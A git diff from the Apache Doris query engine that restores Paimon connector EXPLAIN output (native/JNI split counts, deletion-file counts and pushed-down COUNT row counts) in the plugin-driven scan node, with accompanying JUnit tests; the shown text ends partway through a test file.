a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java @@ -140,6 +140,32 @@ public Map getProperties() { return properties; } + /** + * The precomputed COUNT(*) row count carried by this range (the {@code paimon.row_count} prop set + * by the count-pushdown collapse), or {@code -1} when absent. Drives the EXPLAIN + * {@code pushdown agg=COUNT (n)} line via {@code PluginDrivenScanNode}. Only the single collapsed + * count range carries it; every other range returns {@code -1}, preserving the {@code (-1)} + * no-precomputed-count sentinel (e.g. deletion-vector tables). + */ + @Override + public long getPushDownRowCount() { + String rowCountStr = properties.get("paimon.row_count"); + return rowCountStr != null ? Long.parseLong(rowCountStr) : -1; + } + + /** + * Whether this range takes BE's native (ORC/Parquet) reader: true iff it is NOT a JNI split + * (no {@code paimon.split} property — that property gates the JNI path in + * {@link #populateRangeParams}) AND it has a data-file path. Drives the native/total split + * accounting for the EXPLAIN {@code paimonNativeReadSplits=/} line. Under + * {@code force_jni_scanner=true} every range carries {@code paimon.split}, so all return false + * → native count 0. + */ + @Override + public boolean isNativeReadRange() { + return !properties.containsKey("paimon.split") && path != null; + } + public long getSelfSplitWeight() { return selfSplitWeight; } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java new file mode 100644 index 00000000000000..24ed6f4af00038 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java @@ -0,0 +1,175 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.thrift.TFileRangeDesc; +import org.apache.doris.thrift.TTableFormatFileDesc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +/** + * FIX-E (explain gap) — pins the connector half of the re-emitted EXPLAIN lines the legacy + * {@code PaimonScanNode} produced but the SPI scan path dropped: + * {@code paimonNativeReadSplits=/} ({@link PaimonScanPlanProvider#appendExplainInfo}) + * and the deletion-file lookup behind {@code deleteFileNum} + * ({@link PaimonScanPlanProvider#getDeleteFiles}), plus the two {@link PaimonScanRange} getters that + * feed the generic node's accounting. + * + *

      Offline: these methods touch neither the catalog nor a live table, so a 2-arg provider with a + * {@code null} catalogOps is sufficient.

      + */ +public class PaimonScanExplainTest { + + private static PaimonScanPlanProvider provider() { + return new PaimonScanPlanProvider(new HashMap<>(), null); + } + + // ==================== appendExplainInfo: paimonNativeReadSplits ==================== + + @Test + public void appendExplainInfoEmitsNativeReadSplitsFromSyntheticKeys() { + // WHY: under force_jni_scanner=true the node accumulates 0 native of 1 total and injects them + // as the synthetic __native_read_splits / __total_read_splits keys; the provider must emit + // exactly "paimonNativeReadSplits=0/1" (the assertion in test_paimon_catalog_varbinary / + // _timestamp_tz). MUTATION: dropping the override, or reading the wrong keys, makes this red. + Map props = new HashMap<>(); + props.put("__native_read_splits", "0"); + props.put("__total_read_splits", "1"); + + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, " ", props); + + Assertions.assertEquals(" paimonNativeReadSplits=0/1\n", out.toString()); + } + + @Test + public void appendExplainInfoEmitsNonZeroNativeOverTotal() { + // A mixed native/JNI scan: 3 native of 5 total -> "paimonNativeReadSplits=3/5". Pins that the + // raw counts pass through verbatim (numerator native, denominator total), not a recomputation. + Map props = new HashMap<>(); + props.put("__native_read_splits", "3"); + props.put("__total_read_splits", "5"); + + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, "", props); + + Assertions.assertEquals("paimonNativeReadSplits=3/5\n", out.toString()); + } + + @Test + public void appendExplainInfoSkipsWhenSyntheticKeysAbsent() { + // WHY: when the node has not yet accounted splits (or another connector's props map), the keys + // are absent and the line must NOT print (never a spurious "0/0"). Pins the null-guard. + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, " ", new HashMap<>()); + Assertions.assertEquals("", out.toString()); + } + + // ==================== getDeleteFiles: deletion-vector path ==================== + + /** Builds a real per-range thrift carrying a paimon deletion file at {@code path}. */ + private static TTableFormatFileDesc rangeWithDeletionFile(String path) { + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("orc") + .deletionFile(path, 8L, 16L) // native path: no paimon.split, with a deletion file + .build(); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + TTableFormatFileDesc tableFormat = new TTableFormatFileDesc(); + range.populateRangeParams(tableFormat, rangeDesc); + return tableFormat; + } + + @Test + public void getDeleteFilesReturnsDeletionPath() { + // WHY: the VERBOSE block counts deleteFileNum from this list; it must surface the deletion-vector + // path threaded onto the range's TPaimonFileDesc. MUTATION: returning empty (no read of + // getDeletionFile().getPath()) regresses deleteFileNum to 0. + TTableFormatFileDesc tableFormat = rangeWithDeletionFile("oss://bkt/db/tbl/index/dv-1.bin"); + + List files = provider().getDeleteFiles(tableFormat); + + Assertions.assertEquals(1, files.size()); + Assertions.assertEquals("oss://bkt/db/tbl/index/dv-1.bin", files.get(0)); + } + + @Test + public void getDeleteFilesEmptyWhenNoDeletionFile() { + // A native range with NO deletion file -> empty list (deleteFileNum contribution 0). Pins the + // isSetDeletionFile guard, mirroring legacy PaimonScanNode.getDeleteFiles. + PaimonScanRange range = new PaimonScanRange.Builder().fileFormat("orc").build(); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + TTableFormatFileDesc tableFormat = new TTableFormatFileDesc(); + range.populateRangeParams(tableFormat, rangeDesc); + + Assertions.assertTrue(provider().getDeleteFiles(tableFormat).isEmpty()); + } + + @Test + public void getDeleteFilesEmptyWhenNoPaimonParams() { + // A bare table-format desc (no paimon params) -> empty, never NPE. Pins the isSetPaimonParams + // guard so the VERBOSE loop is safe for any range shape. + Assertions.assertTrue(provider().getDeleteFiles(new TTableFormatFileDesc()).isEmpty()); + Assertions.assertTrue(provider().getDeleteFiles(null).isEmpty()); + } + + // ==================== PaimonScanRange getter permutations ==================== + + @Test + public void nativeRangeIsNativeAndCarriesNoCount() { + // A native range: a path, no paimon.split, no row count -> isNativeReadRange()=true, + // getPushDownRowCount()=-1. This is the range that increments the native numerator. + PaimonScanRange range = new PaimonScanRange.Builder() + .path("oss://bkt/db/tbl/data-1.orc") + .fileFormat("orc") + .build(); + Assertions.assertTrue(range.isNativeReadRange()); + Assertions.assertEquals(-1, range.getPushDownRowCount()); + } + + @Test + public void jniRangeIsNotNative() { + // A JNI range carries paimon.split (and no native path) -> NOT native. Under force_jni_scanner + // every range is this shape, so the native numerator stays 0 (the 0 in 0/1). + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("parquet") + .paimonSplit("serialized-split") + .tableLocation("oss://bkt/db/tbl") + .build(); + Assertions.assertFalse(range.isNativeReadRange()); + } + + @Test + public void countRangeCarriesRowCountAndIsNotNative() { + // The collapsed COUNT(*) range: a JNI split carrying paimon.row_count -> NOT native, and + // getPushDownRowCount() returns the summed total (12). This is what feeds "pushdown agg=COUNT + // (12)". MUTATION: a getter ignoring paimon.row_count would return -1 here. + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("parquet") + .paimonSplit("serialized-split") + .tableLocation("oss://bkt/db/tbl") + .rowCount(12L) + .build(); + Assertions.assertFalse(range.isNativeReadRange()); + Assertions.assertEquals(12L, range.getPushDownRowCount()); + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/FileScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/FileScanNode.java index 466dad11d5dc49..27992c86213348 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/FileScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/FileScanNode.java @@ -149,68 +149,7 @@ public String getNodeExplainString(String prefix, TExplainLevel detailLevel) { .append("\n"); if (detailLevel == TExplainLevel.VERBOSE && !isBatch) { - output.append(prefix).append("backends:").append("\n"); - Multimap scanRangeLocationsMap = ArrayListMultimap.create(); - // 1. group by backend id - for (TScanRangeLocations locations : scanRangeLocations) { - scanRangeLocationsMap.putAll(locations.getLocations().get(0).backend_id, - locations.getScanRange().getExtScanRange().getFileScanRange().getRanges()); - } - for (long beId : scanRangeLocationsMap.keySet()) { - output.append(prefix).append(" ").append(beId).append("\n"); - List fileRangeDescs = Lists.newArrayList(scanRangeLocationsMap.get(beId)); - // 2. sort by file start offset - Collections.sort(fileRangeDescs, new Comparator() { - @Override - public int compare(TFileRangeDesc o1, TFileRangeDesc o2) { - return Long.compare(o1.getStartOffset(), o2.getStartOffset()); - } - }); - - // A Data file may be divided into different splits, so a set is used to remove duplicates. - Set dataFilesSet = new HashSet<>(); - // A delete file might be used by multiple data files, so use set to remove duplicates. - Set deleteFilesSet = new HashSet<>(); - // You can estimate how many delete splits need to be read for a data split - // using deleteSplitNum / dataSplitNum(fileRangeDescs.size()) split. - long deleteSplitNum = 0; - for (TFileRangeDesc fileRangeDesc : fileRangeDescs) { - dataFilesSet.add(fileRangeDesc.getPath()); - List deletefiles = getDeleteFiles(fileRangeDesc); - deleteFilesSet.addAll(deletefiles); - deleteSplitNum += deletefiles.size(); - } - - // 3. if size <= 4, print all. if size > 4, print first 3 and last 1 - int size = fileRangeDescs.size(); - if (size <= 4) { - for (TFileRangeDesc file : fileRangeDescs) { - output.append(prefix).append(" ").append(file.getPath()) - .append(" start: ").append(file.getStartOffset()) - .append(" length: ").append(file.getSize()) - .append("\n"); - } - } else { - for (int i = 0; i < 3; i++) { - TFileRangeDesc file = fileRangeDescs.get(i); - output.append(prefix).append(" ").append(file.getPath()) - .append(" start: ").append(file.getStartOffset()) - .append(" length: ").append(file.getSize()) - .append("\n"); - } - int other = size - 4; - output.append(prefix).append(" ... other ").append(other).append(" files ...\n"); - TFileRangeDesc file = fileRangeDescs.get(size - 1); - output.append(prefix).append(" ").append(file.getPath()) - .append(" start: ").append(file.getStartOffset()) - .append(" length: ").append(file.getSize()) - .append("\n"); - } - output.append(prefix).append(" ").append("dataFileNum=").append(dataFilesSet.size()) - .append(", deleteFileNum=").append(deleteFilesSet.size()) - .append(", deleteSplitNum=").append(deleteSplitNum) - .append("\n"); - } + appendBackendScanRangeDetail(output, prefix); } output.append(prefix); @@ -245,6 +184,79 @@ public int compare(TFileRangeDesc o1, TFileRangeDesc o2) { return output.toString(); } + /** + * Appends the VERBOSE per-backend scan-range detail (the {@code backends:} block, the per-file + * {@code path start/length} lines, and the {@code dataFileNum/deleteFileNum/deleteSplitNum} + * summary) to {@code output}. Extracted verbatim from {@link #getNodeExplainString} so a custom + * EXPLAIN override that does NOT call super (e.g. {@code PluginDrivenScanNode}) can re-emit this + * block under the same {@code VERBOSE && !isBatchMode()} gate. Behavior-neutral for existing + * subclasses: the body is unchanged and still runs only from the same call site. + */ + protected void appendBackendScanRangeDetail(StringBuilder output, String prefix) { + output.append(prefix).append("backends:").append("\n"); + Multimap scanRangeLocationsMap = ArrayListMultimap.create(); + // 1. group by backend id + for (TScanRangeLocations locations : scanRangeLocations) { + scanRangeLocationsMap.putAll(locations.getLocations().get(0).backend_id, + locations.getScanRange().getExtScanRange().getFileScanRange().getRanges()); + } + for (long beId : scanRangeLocationsMap.keySet()) { + output.append(prefix).append(" ").append(beId).append("\n"); + List fileRangeDescs = Lists.newArrayList(scanRangeLocationsMap.get(beId)); + // 2. sort by file start offset + Collections.sort(fileRangeDescs, new Comparator() { + @Override + public int compare(TFileRangeDesc o1, TFileRangeDesc o2) { + return Long.compare(o1.getStartOffset(), o2.getStartOffset()); + } + }); + + // A Data file may be divided into different splits, so a set is used to remove duplicates. + Set dataFilesSet = new HashSet<>(); + // A delete file might be used by multiple data files, so use set to remove duplicates. + Set deleteFilesSet = new HashSet<>(); + // You can estimate how many delete splits need to be read for a data split + // using deleteSplitNum / dataSplitNum(fileRangeDescs.size()) split. + long deleteSplitNum = 0; + for (TFileRangeDesc fileRangeDesc : fileRangeDescs) { + dataFilesSet.add(fileRangeDesc.getPath()); + List deletefiles = getDeleteFiles(fileRangeDesc); + deleteFilesSet.addAll(deletefiles); + deleteSplitNum += deletefiles.size(); + } + + // 3. if size <= 4, print all. if size > 4, print first 3 and last 1 + int size = fileRangeDescs.size(); + if (size <= 4) { + for (TFileRangeDesc file : fileRangeDescs) { + output.append(prefix).append(" ").append(file.getPath()) + .append(" start: ").append(file.getStartOffset()) + .append(" length: ").append(file.getSize()) + .append("\n"); + } + } else { + for (int i = 0; i < 3; i++) { + TFileRangeDesc file = fileRangeDescs.get(i); + output.append(prefix).append(" ").append(file.getPath()) + .append(" start: ").append(file.getStartOffset()) + .append(" length: ").append(file.getSize()) + .append("\n"); + } + int other = size - 4; + output.append(prefix).append(" ... other ").append(other).append(" files ...\n"); + TFileRangeDesc file = fileRangeDescs.get(size - 1); + output.append(prefix).append(" ").append(file.getPath()) + .append(" start: ").append(file.getStartOffset()) + .append(" length: ").append(file.getSize()) + .append("\n"); + } + output.append(prefix).append(" ").append("dataFileNum=").append(dataFilesSet.size()) + .append(", deleteFileNum=").append(deleteFilesSet.size()) + .append(", deleteSplitNum=").append(deleteSplitNum) + .append("\n"); + } + } + protected void setDefaultValueExprs(TableIf tbl, Map slotDescByName, Map exprByName, diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index da1bebe1960998..1a0f15e24023ff 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -104,6 +104,16 @@ public class PluginDrivenScanNode extends FileQueryScanNode { private static final String PROP_LOCATION_PREFIX = "location."; private static final String PROP_HIVE_TEXT_PREFIX = "hive.text."; + // FIX-E (explain gap): synthetic node-property keys threaded into the props map passed to the + // connector's appendExplainInfo, carrying the native/total split counts this node accumulated from + // ConnectorScanRange.isNativeReadRange() in getSplits(). They are NOT real connector properties + // (never reach BE) — only a connector that surfaces a native/JNI split distinction (paimon) reads + // them to emit its "paimonNativeReadSplits=/" line. Byte-identical to the keys + // PaimonScanPlanProvider consumes, so the inject/consume sides stay in lockstep. Connector-agnostic: + // injected for every plugin connector but consumed only by the one that opts in. + private static final String NATIVE_READ_SPLITS_KEY = "__native_read_splits"; + private static final String TOTAL_READ_SPLITS_KEY = "__total_read_splits"; + private final Connector connector; private final ConnectorSession connectorSession; @@ -119,6 +129,12 @@ public class PluginDrivenScanNode extends FileQueryScanNode { // keep the decision stable across reads (mirrors IcebergScanNode). private Boolean isBatchModeCache; + // FIX-E (explain gap): native (ORC/Parquet) vs total scan-range counts accumulated in getSplits() + // from ConnectorScanRange.isNativeReadRange(), surfaced to the connector's appendExplainInfo for the + // "paimonNativeReadSplits=/" line. Default 0/0 (no native splits) before getSplits runs. + private int nativeReadSplitNum; + private int totalReadSplitNum; + // Populated from ConnectorScanPlanProvider.getScanNodePropertiesResult() private ScanNodePropertiesResult cachedPropertiesResult; private Map scanNodeProperties; @@ -258,11 +274,39 @@ public String getNodeExplainString(String prefix, TExplainLevel detailLevel) { // getSplits()/startSplit() (see setSelectedPartitions). output.append(prefix).append("partition=").append(selectedPartitionNum) .append("/").append(totalPartitionNum).append("\n"); - // Delegate connector-specific EXPLAIN info to the SPI + // FIX-E (explain gap): the VERBOSE per-backend block (dataFileNum/deleteFileNum/ + // deleteSplitNum) lives in the parent FileScanNode but this override does not call super, + // so re-emit it under the same VERBOSE && !isBatchMode() gate. GATED to paimon (the only + // connector with merge-on-read delete files surfaced via getDeleteFiles) so es/jdbc/ + // max_compute VERBOSE output stays byte-unchanged. Emitted before the connector explain so + // the block ordering matches the legacy PaimonScanNode (FileScanNode body, then paimon's). + if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode() + && "paimon".equals( + desc.getTable().getDatabase().getCatalog().getType())) { + appendBackendScanRangeDetail(output, prefix); + } + // Delegate connector-specific EXPLAIN info to the SPI. Thread the native/total split counts + // (FIX-E) the node accumulated in getSplits() into a copy of the props map via the synthetic + // keys, so a connector that distinguishes native/JNI reads (paimon) can emit its + // "paimonNativeReadSplits=/" line without an SPI signature change. The copy keeps + // the cached scanNodeProperties unpolluted; non-paimon providers ignore the extra keys. ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); if (scanProvider != null) { - scanProvider.appendExplainInfo(output, prefix, props); + Map explainProps = new HashMap<>(props); + explainProps.put(NATIVE_READ_SPLITS_KEY, String.valueOf(nativeReadSplitNum)); + explainProps.put(TOTAL_READ_SPLITS_KEY, String.valueOf(totalReadSplitNum)); + scanProvider.appendExplainInfo(output, prefix, explainProps); + } + // FIX-E (explain gap): the "pushdown agg= (n)" line lives in the parent FileScanNode + // but this override does not call super. Re-emit it for ALL plugin connectors (universally + // correct — its absence on plugin nodes is itself an inconsistency vs every other + // FileScanNode). When a no-grouping COUNT(*) is pushed down, tableLevelRowCount is set in + // getSplits() from the connector's precomputed count (or stays -1 -> the (-1) sentinel). + output.append(prefix).append(String.format("pushdown agg=%s", getPushDownAggNoGroupingOp())); + if (getPushDownAggNoGroupingOp() == TPushAggOp.COUNT) { + output.append(" (").append(tableLevelRowCount).append(")"); } + output.append("\n"); // Show ES terminate_after optimization when limit is pushed to ES if (limit > 0 && conjuncts.isEmpty() && "es_http".equals(props.get(PROP_FILE_FORMAT_TYPE))) { @@ -304,6 +348,24 @@ protected TableIf getTargetTable() throws UserException { return desc.getTable(); } + /** + * FIX-E (explain gap): delegates the VERBOSE per-backend block's delete-file lookup to the + * connector SPI. The parent {@link FileScanNode#getDeleteFiles} returns empty; a connector that + * threads delete files onto its per-range thrift (paimon's deletion vectors) overrides + * {@link ConnectorScanPlanProvider#getDeleteFiles(TTableFormatFileDesc)} to read them back. Reads + * the table-format params off the range (null-guarded, mirroring legacy + * {@code PaimonScanNode.getDeleteFiles}); connectors without delete files return empty, so the + * {@code deleteFileNum} count stays 0. + */ + @Override + protected List getDeleteFiles(TFileRangeDesc rangeDesc) { + ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); + if (scanProvider == null || rangeDesc == null || !rangeDesc.isSetTableFormatParams()) { + return Collections.emptyList(); + } + return scanProvider.getDeleteFiles(rangeDesc.getTableFormatParams()); + } + @Override protected Map getLocationProperties() throws UserException { Map props = getOrLoadScanNodeProperties(); @@ -577,9 +639,59 @@ public List getSplits(int numBackends) throws UserException { for (ConnectorScanRange range : ranges) { splits.add(new PluginDrivenSplit(range)); } + // FIX-E (explain gap): accumulate the native/total scan-range counts (for the connector + // EXPLAIN line paimonNativeReadSplits) and, under COUNT(*) pushdown, the precomputed merged row + // count (for FileScanNode's "pushdown agg=COUNT (n)" line). Both come from generic + // ConnectorScanRange getters (default false / -1), so non-paimon connectors are unaffected. + this.nativeReadSplitNum = countNativeReadRanges(ranges); + this.totalReadSplitNum = ranges.size(); + long pushDownRowCount = resolvePushDownRowCount(countPushdown, ranges); + if (pushDownRowCount >= 0) { + // Only set when a range actually carries a precomputed count (e.g. paimon's collapsed count + // range). Deletion-vector tables emit no count range, so tableLevelRowCount stays -1 and the + // line renders the (-1) sentinel — the correctness-critical no-precomputed-count case. + setPushDownCount(pushDownRowCount); + } return splits; } + /** + * Counts the scan ranges read by BE's native (ORC/Parquet) reader (vs JNI), via the generic + * {@link ConnectorScanRange#isNativeReadRange()} (default false). Drives the EXPLAIN + * {@code paimonNativeReadSplits=/} numerator. Pure static so the accounting is + * unit-testable without driving a full {@code planScan}. + */ + static int countNativeReadRanges(List ranges) { + int nativeCount = 0; + for (ConnectorScanRange range : ranges) { + if (range.isNativeReadRange()) { + nativeCount++; + } + } + return nativeCount; + } + + /** + * Resolves the pushed-down COUNT(*) row count to surface on the EXPLAIN + * {@code pushdown agg=COUNT (n)} line: the first range carrying a precomputed count + * ({@link ConnectorScanRange#getPushDownRowCount()} {@code >= 0}) when count pushdown is active, + * else {@code -1}. The {@code -1} return is load-bearing (Rule 9): a deletion-vector table emits + * NO count range, so the sentinel must survive and render as {@code (-1)} — BE then counts by + * reading. Returns {@code -1} immediately when count pushdown is not active (a non-COUNT scan must + * never pick up a stray precomputed count). Pure static so the sentinel survival is unit-testable. + */ + static long resolvePushDownRowCount(boolean countPushdown, List ranges) { + if (!countPushdown) { + return -1; + } + for (ConnectorScanRange range : ranges) { + if (range.getPushDownRowCount() >= 0) { + return range.getPushDownRowCount(); + } + } + return -1; + } + /** * Source-side LIMIT to pass to {@code planScan}: the real limit normally, but {@code -1} * (no source limit) when non-pushable conjuncts were stripped from the filter. A source LIMIT diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeDeleteFilesTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeDeleteFilesTest.java new file mode 100644 index 00000000000000..634c1ec6e5fa59 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeDeleteFilesTest.java @@ -0,0 +1,115 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.common.jmockit.Deencapsulation; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; +import org.apache.doris.thrift.TFileRangeDesc; +import org.apache.doris.thrift.TTableFormatFileDesc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Arrays; +import java.util.List; + +/** + * FIX-E (explain gap) — guards {@link PluginDrivenScanNode#getDeleteFiles(TFileRangeDesc)}, the + * override the SPI scan path was missing. The VERBOSE per-backend EXPLAIN block (inherited from + * {@code FileScanNode}) calls {@code getDeleteFiles(rangeDesc)} to count deletion files; without this + * override it returned empty, so {@code deleteFileNum} was always 0 and the {@code deleteFileNum} + * substring never appeared ({@code test_paimon_deletion_vector_oss} asserts it is present). + * + *

      Why this matters (Rule 9): the override must DELEGATE to the connector's + * {@link ConnectorScanPlanProvider#getDeleteFiles(TTableFormatFileDesc)} (paimon reads its deletion + * vector off the per-range thrift), and must null-guard a range with no table-format params (legacy + * {@code PaimonScanNode.getDeleteFiles} parity) so the VERBOSE loop never NPEs. Driven on a + * {@code CALLS_REAL_METHODS} mock with the {@code connector} field injected (no full + * {@code FileQueryScanNode} constructor needed; the method is package/protected exactly to enable + * this, mirroring {@code PluginDrivenScanNodeSysHandleTest}'s Deencapsulation approach).

      + */ +public class PluginDrivenScanNodeDeleteFilesTest { + + private static PluginDrivenScanNode nodeWithProvider(ConnectorScanPlanProvider provider) { + PluginDrivenScanNode node = + Mockito.mock(PluginDrivenScanNode.class, Mockito.CALLS_REAL_METHODS); + Connector connector = Mockito.mock(Connector.class); + Mockito.when(connector.getScanPlanProvider()).thenReturn(provider); + Deencapsulation.setField(node, "connector", connector); + return node; + } + + @Test + public void delegatesToProviderWithTableFormatParams() { + // WHY: the node must hand the range's table-format params to the connector, which reads the + // paimon deletion-file path back off them. MUTATION: an override that returns empty (no + // delegation) makes deleteFileNum always 0 -> red. The distinct returned list proves the + // connector's result flows through, and verify() proves the exact params were passed. + TTableFormatFileDesc tableFormat = new TTableFormatFileDesc(); + List expected = Arrays.asList("oss://bkt/db/tbl/index/deletion-1.bin"); + + ConnectorScanPlanProvider provider = Mockito.mock(ConnectorScanPlanProvider.class); + Mockito.when(provider.getDeleteFiles(tableFormat)).thenReturn(expected); + + PluginDrivenScanNode node = nodeWithProvider(provider); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + rangeDesc.setTableFormatParams(tableFormat); + + List result = node.getDeleteFiles(rangeDesc); + + Assertions.assertEquals(expected, result); + Mockito.verify(provider).getDeleteFiles(tableFormat); + } + + @Test + public void rangeWithoutTableFormatParamsReturnsEmptyAndSkipsProvider() { + // WHY: a range with no table-format params (e.g. a non-paimon split path) must yield empty + // WITHOUT consulting the provider — legacy PaimonScanNode.getDeleteFiles null-guards exactly + // this so the VERBOSE loop never NPEs. MUTATION: dropping the isSetTableFormatParams guard + // would call the provider with null -> here it would fail verifyNoInteractions. + ConnectorScanPlanProvider provider = Mockito.mock(ConnectorScanPlanProvider.class); + PluginDrivenScanNode node = nodeWithProvider(provider); + + List result = node.getDeleteFiles(new TFileRangeDesc()); + + Assertions.assertTrue(result.isEmpty()); + Mockito.verifyNoInteractions(provider); + } + + @Test + public void nullRangeReturnsEmpty() { + // Defensive: a null range must not NPE (returns empty), mirroring the legacy guard. + ConnectorScanPlanProvider provider = Mockito.mock(ConnectorScanPlanProvider.class); + PluginDrivenScanNode node = nodeWithProvider(provider); + + Assertions.assertTrue(node.getDeleteFiles(null).isEmpty()); + Mockito.verifyNoInteractions(provider); + } + + @Test + public void nullProviderReturnsEmpty() { + // A connector without a scan plan provider (no scan capability) must yield empty, never NPE. + PluginDrivenScanNode node = nodeWithProvider(null); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + rangeDesc.setTableFormatParams(new TTableFormatFileDesc()); + + Assertions.assertTrue(node.getDeleteFiles(rangeDesc).isEmpty()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeExplainStatsTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeExplainStatsTest.java new file mode 100644 index 00000000000000..008c43fbb4de6c --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeExplainStatsTest.java @@ -0,0 +1,146 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.connector.api.scan.ConnectorScanRange; +import org.apache.doris.connector.api.scan.ConnectorScanRangeType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.ArrayList; +import java.util.Collections; +import java.util.List; +import java.util.Map; + +/** + * FIX-E (explain gap) — guards {@link PluginDrivenScanNode#countNativeReadRanges} and + * {@link PluginDrivenScanNode#resolvePushDownRowCount}, the per-scan accounting that feeds the two + * EXPLAIN lines the legacy {@code PaimonScanNode} emitted but the SPI scan path dropped: + * {@code paimonNativeReadSplits=/} and {@code pushdown agg=COUNT (n)}. + * + *

      Why this matters (Rule 9 — tests encode WHY):

      + *
        + *
      • native/total accounting: under {@code force_jni_scanner=true} every paimon range goes + * JNI ({@code isNativeReadRange()==false}), so the native numerator MUST be 0 over N total + * ({@code paimonNativeReadSplits=0/1} is the exact assertion in + * {@code test_paimon_catalog_varbinary}/{@code _timestamp_tz}). A mutation that counts all ranges + * as native, or that ignores {@code isNativeReadRange()}, is killed.
      • + *
      • the {@code -1} sentinel must survive: a deletion-vector table emits NO precomputed count + * range, so the pushdown count must stay {@code -1} and render as {@code (-1)} + * ({@code test_paimon_deletion_vector} asserts {@code pushdown agg=COUNT (-1)}). Append/merge + * tables DO emit a count range carrying the merged sum (12 / 8), which must be picked up. A + * mutation that defaults the sentinel to 0, or that reads a count even when pushdown is inactive, + * is killed.
      • + *
      + */ +public class PluginDrivenScanNodeExplainStatsTest { + + /** Minimal fake range: native flag + optional precomputed count, the only two getters under test. */ + private static ConnectorScanRange range(boolean nativeRead, long pushDownRowCount) { + return new ConnectorScanRange() { + @Override + public ConnectorScanRangeType getRangeType() { + return ConnectorScanRangeType.FILE_SCAN; + } + + @Override + public Map getProperties() { + return Collections.emptyMap(); + } + + @Override + public boolean isNativeReadRange() { + return nativeRead; + } + + @Override + public long getPushDownRowCount() { + return pushDownRowCount; + } + }; + } + + private static List ranges(ConnectorScanRange... rs) { + List list = new ArrayList<>(); + Collections.addAll(list, rs); + return list; + } + + // ==================== native/total accounting ==================== + + @Test + public void allJniRangesCountZeroNative() { + // force_jni_scanner=true: every range is JNI -> native count 0 (the 0 in 0/1). Total is the + // caller's ranges.size(); here the single JNI split gives 0/1, exactly the failing assertion. + List rs = ranges(range(false, -1)); + Assertions.assertEquals(0, PluginDrivenScanNode.countNativeReadRanges(rs)); + Assertions.assertEquals(1, rs.size()); + } + + @Test + public void mixedNativeAndJniCountsOnlyNative() { + // Native router on: a mix of native ORC/Parquet 